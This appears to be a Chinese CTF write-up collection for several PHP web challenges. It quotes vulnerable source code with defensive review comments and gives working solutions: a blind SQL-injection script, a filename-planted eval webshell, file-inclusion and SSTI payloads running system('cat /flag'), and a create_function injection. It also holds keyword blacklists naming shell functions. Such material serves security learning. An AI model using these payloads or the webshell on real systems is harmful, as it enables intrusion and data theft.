$function = @$_GET['f']; // `@` silences the undefined-index notice; $function is null when ?f= is absent
/**
 * Remove a fixed, case-insensitive blacklist of substrings from $img.
 *
 * Alternatives are tried left to right at each position, so 'php' always
 * wins over 'php5'/'php4': "php5" becomes "5", never "". When the caller
 * applies this to an already-serialized string, the deletions shorten the
 * string values but leave the s:N length prefixes untouched.
 *
 * @param string $img subject string
 * @return string|null the stripped string, or null if PCRE fails
 */
function filter($img){
    $pattern = '/php|flag|php5|php4|fl1g/i';
    return preg_replace($pattern, '', $img);
}
// Reset session state. NOTE(review): unset($_SESSION) is not session_unset()/session_destroy();
// confirm what server-side session data actually survives this.
if($_SESSION){
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
// extract() with its default EXTR_OVERWRITE imports every POST field as a variable in this
// scope, so the client can replace anything assigned above — $function, and the $_SESSION
// array itself (variable overwrite). Fix: drop extract() and read the needed $_POST keys explicitly.
extract($_POST);
if(!$function){
echo 'source_code';
}
// img_path never reaches the filesystem directly: it is hashed, so on its own it cannot
// choose a file. The default image name is stored base64-encoded.
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
// The blacklist runs AFTER serialize(): deleting substrings shortens string values but not
// the s:N length prefixes already written, so a client-shaped $_SESSION (via extract above)
// can make unserialize() below parse a different structure. Filter before serializing —
// or, better, never unserialize() data the client can influence.
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){ // loose ==; $function is client input (?f= or POST overwrite)
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
// eval() of a constant string is not injectable by itself, but phpinfo() discloses
// ini settings such as auto_append_file to the client.
}else if($function == 'show_image'){
// unserialize() of client-influenced data, then the decoded 'img' value is used as a
// path: arbitrary file read. Use json_decode() plus an allow-list of image names instead.
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
f=phpinfo，发现 flag 相关线索：auto_append_file d0g3_f1ag.php
show_image，会把 $_SESSION[img] 中的内容 base64 解码然后显示出来。
img_path 进行了处理，所以不能直接利用。
extract($_POST); 存在变量覆盖。
filter 函数中会把 flag 和 php 替换为空，且是先序列化再过滤：
_SESSION[phpflag]=;s:7:"xxxxxxx";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
$flag = 'flag in /d0g3_fllllllag'; // body of the appended file: only a pointer to where the flag lives, not the flag itself
?>
phtml 绕过
image.php?id=1，猜测存在 SQL 注入，看一下备份
<?php
include "config.php"; // presumably defines $con (mysqli handle) — not visible here
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
// Escape, then strip: addslashes() doubles backslashes and escapes quotes, but the
// str_replace() calls below run on that output and delete the sequences `\0`, `%00`,
// `\'` and `'`. Deleting "\0" out of an escaped "\\0" leaves a lone `\`, which then
// escapes the closing quote in the SQL string — the stripping undoes the escaping.
// None of this replaces a prepared statement (mysqli_prepare + bind_param).
$id=addslashes($id); // escape quotes/backslashes
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
// String-built SQL with two client-controlled values.
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
// The served file is chosen by whatever row the query returns; a client can observe
// "row found / not found" from whether a JPEG comes back (a boolean oracle).
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
'
，所以我们用 \0 转义单引号：输入 \0，经过 addslashes 函数会先变成 \\0，然后经过 str_replace 函数会变成 \，可以转义 id 后面的引号，构造成 select * from images where id='\' or path=' or 1=1#
import requests
# Defender note: this loop issues on the order of a hundred x ~7 near-identical GETs to
# image.php, each with a growing substr() offset in the query string. That volume, and the
# `if(ascii(substr(` / `%23` tokens in the URL, are straightforward access-log / WAF signatures.
re1 = requests.session()
# id=\0 relies on the addslashes()/str_replace() ordering in image.php shown above.
url = "http://1247dad7-f45e-43b0-93f5-4c3fbf890b7c.node3.buuoj.cn/image.php?id=\\0&path="
# Boolean-blind condition; the only feedback channel is whether the response is a JPEG.
payload = "or id=if(ascii(substr((select password from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):  # one character position per iteration (indentation was lost in this paste)
l = 32
r = 130
mid = (l + r)>>1  # overwritten on the first loop iteration; harmless
while(l<r):
payloads = payload.format(i,mid)
# print(url+payloads)
html = re1.get(url+payloads)
if "JFIF" in html.text:  # a JPEG came back, i.e. the row matched, i.e. the condition held
l = mid +1
else:
r = mid
mid = (l + r)>>1
result+=chr(mid)  # loop exits with l == r == mid
print(result)
admin a2869e6057728e5dbb5d
User admin uploaded file 1.png. User admin uploaded file 1.png. User admin uploaded file 1.png.
,记录了文件名,所以可以修改文件名上马,这里用的是php短标签,传入filename==$_GET['cmd']; eval($_POST['cmd']); ?>
.git
include 'flag.php'; // presumably defines $flag (not visible here)
$yds = "dog";
$is = "cat";
$handsome = 'yds';
// Variable variables keyed on request data: `$$x = $y` writes the client's value into the
// variable whose NAME the client chose — any variable in this scope, $flag included, can be
// overwritten. Read $_POST['…'] explicitly instead of `$$`.
foreach($_POST as $x => $y){
$$x = $y;
}
// From GET: `$$x = $$y` reads the variable named $y and assigns it to the variable named $x;
// both names are client-chosen, so this is an arbitrary variable read/copy.
foreach($_GET as $x => $y){
$$x = $$y;
}
// If some GET key equals the value of ?flag= (and is not literally 'flag'), exit with $handsome.
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){
exit($handsome);
}
}
// A 'flag' parameter must be present in GET or POST ...
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}
// ... but its value may not be the literal string 'flag'.
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($is);
}
// Reached only when the gates above pass; note $flag may have been replaced by the loops above.
echo "the flag is: ".$flag;
error_reporting(0); // hides the warnings file_get_contents()/include() emit on bad input
$text = $_GET["text"];
$file = $_GET["file"];
// file_get_contents() resolves stream wrappers, so $text can be any readable source, not
// just a path. NOTE: the second argument 'r' is the bool use_include_path flag (truthy
// here), not a file mode.
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "
"
.file_get_contents($text,'r')."";
// Only the substring "flag" is rejected in $file; wrappers (php://filter ...) and any other
// path still reach include(): local/stream file inclusion. Use an allow-list of includable
// files rather than a substring blacklist.
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file); //next.php
}
else{
highlight_file(__FILE__);
}
?>
get方式提交text和file
text可以使用伪协议构造出来等于I have a dream
file中不能有flag
构造text=data:text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
读得next.php的源码
$id = $_GET['id']; // read straight from the query string, no validation
$_SESSION['id'] = $id; // stored as-is; not used again in this snippet
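/**
 * Lower-case every match of the caller-supplied pattern fragment in $str.
 *
 * The original used the `/e` modifier with a string replacement, which
 * evaluates the replacement as PHP code (removed in PHP 7.0; before that it
 * was a code-execution sink whenever $str or $re was attacker-controlled).
 * preg_replace_callback() performs the same lower-casing without any eval.
 *
 * @param string $re  regex fragment, interpolated unescaped into the pattern.
 *                    NOTE(review): callers must preg_quote() untrusted input,
 *                    otherwise the fragment is a regex injection point.
 * @param string $str subject string
 * @return string|null the rewritten string, or null when PCRE fails
 *                     (e.g. $re is not a valid pattern)
 */
function complex($re, $str) {
    return preg_replace_callback(
        '/(' . $re . ')/i',
        function ($m) {
            // $m[1] always exists: the pattern wraps $re in one capturing group.
            return strtolower($m[1]);
        },
        $str
    );
}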
// Every query-string KEY becomes the regex fragment and every VALUE the subject of
// complex(): the key is interpolated unescaped into the pattern, so this is a regex
// injection point. preg_quote($re, '/') the key, or drop this echo loop entirely.
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
// Not called anywhere in this snippet. @eval() on a raw GET parameter executes arbitrary
// PHP; the `@` only hides errors and is no safeguard. Nothing here should eval client input.
function getFlag(){
@eval($_GET['cmd']);
}
next.php?\S*=${getflag()}&cmd=system("cat /flag");
{{system("cat /flag")}}
获得flag{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};
1nD3x.php
highlight_file(__FILE__); // the source is disclosed on purpose
error_reporting(0);
$file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';
echo "
This is a very simple challenge and if you solve it I will give you a flag. Good Luck!
";
// Keyword blacklist applied to the RAW query string (before URL-decoding), so a
// percent-encoded keyword is not matched here yet is decoded into $_GET. Check the
// decoded values instead, or better, replace blacklists with an allow-list of parameters.
if($_SERVER) {
if (
preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
)
die('You seem to want to do something bad?');
}
// Only http/https are refused for $file; other stream wrappers (data://, php://) are not.
if (!preg_match('/http|https/i', $_GET['file'])) {
// `$` without the D modifier also matches just before a trailing newline, so
// "aqua_is_cute\n" satisfies the regex while failing the strict !== comparison.
// Use '/^aqua_is_cute$/D' (or drop the regex and compare strings directly).
if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
$file = $_GET["file"];
echo "Neeeeee! Good Job!
";
}
} else die('fxck you! What do you want to do ?!');
// Rejects any $_REQUEST VALUE containing a letter; keys are not checked, and array-valued
// parameters are not strings (preg_match() on an array warns and returns false on PHP 7,
// throws TypeError on PHP 8 — NOTE(review): confirm the target's PHP version).
if($_REQUEST) {
foreach($_REQUEST as $value) {
if(preg_match('/[a-zA-Z]/i', $value))
die('fxck you! I hate English!');
}
}
// $file may be any non-http(s) wrapper, so this equality is client-satisfiable (data://).
if (file_get_contents($file) !== 'debu_debu_aqua')
die("Aqua is the cutest five-year-old child in the world! Isn't it ?
");
// If both inputs are arrays, sha1() returns null for each on PHP 7 (with a warning), so
// === holds while != also holds; on PHP 8 sha1(array) is a TypeError — NOTE(review):
// confirm version. Reject non-string input and compare hashes with hash_equals().
if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
// extract() of a client-supplied array overwrites $code, $arg (and $file) used below.
extract($_GET["flag"]);
echo "Very good! you know my password. But what is flag?
";
} else{
die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}
// $code is called as a function with $arg: a client-chosen callable name guarded only by
// blacklists. create_function (deprecated 7.2, removed 8.0) passes the $code check.
// Replace the dynamic call with an allow-list of permitted callables.
if(preg_match('/^[a-z0-9]*$/isD', $code) ||
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {
die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else {
include "flag.php";
$code('', $arg);
} ?>
代码很长
首先是对 $_SERVER['QUERY_STRING'] 进行了限制，可以用 urlencode 绕过
绕过preg_match('/^aqua_is_cute$/'
,在debu后加上%0a,因为preg_match只匹配第一行
file_get_contents
是用data://协议或者php://input
sha1()使用数组绕过
当时做题时是非预期做的,再复现的时候忘了怎么做的了,还好Y1NG师傅当时把我的payload写到博客里了,链接
我的payload1nD3x.php?zuishuai=y1ngzuishuai &y1ng[]=111&passwd[]=222&passwd[]=222&flag[arg]=}var_dump(require(end(pos(get_defined_vars()))));//&flag[code]=create_function&file=data://text/plain,y1ng_YuZhou_Wudi_zuishuai&rdd=php://filter/convert.base64-encode/resource=1flag.php